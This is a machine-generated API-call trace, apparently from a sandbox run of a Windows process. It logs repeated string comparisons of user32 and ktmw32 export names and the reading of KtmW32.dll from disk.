[0252.855] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0252.855] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0252.855] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0252.855] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0252.856] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0252.856] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0252.856] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0252.856] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0252.856] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0252.856] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0252.856] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0252.856] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0252.856] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0252.856] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0252.856] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0252.856] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0252.857] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0252.857] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0252.858] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0252.975] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0252.975] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0252.976] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0252.977] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0253.301] GetProcessHeap () returned 0x4e0000 [0253.301] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x40e7040 | out: hHeap=0x4e0000) returned 1 [0253.309] GetProcessHeap () returned 0x4e0000 [0253.309] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f9040 [0253.309] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0253.313] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0253.313] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0253.314] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0253.314] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0253.314] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0253.314] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0253.314] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0253.314] GetProcessHeap () returned 0x4e0000 [0253.314] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x5e00) returned 0x2d25030 [0253.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0253.315] ReadFile (in: hFile=0x17c, lpBuffer=0x2d25030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d25030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0253.316] CloseHandle (hObject=0x17c) returned 1 [0253.316] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0253.316] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0253.316] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0253.316] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0253.316] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0253.316] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0253.316] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0253.316] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0253.316] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0253.316] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0253.316] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0253.316] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0253.316] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0253.316] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0253.317] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0253.317] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0253.317] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0253.317] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0253.317] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0253.317] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0253.317] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0253.317] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0253.317] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0253.317] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0253.318] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0253.318] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0253.318] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0253.318] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0253.318] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0253.318] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0253.318] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0253.318] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0253.318] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0253.318] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0253.318] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.318] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0253.319] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0253.319] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0253.319] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0253.320] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0253.320] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0253.321] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0253.321] lstrcmpA 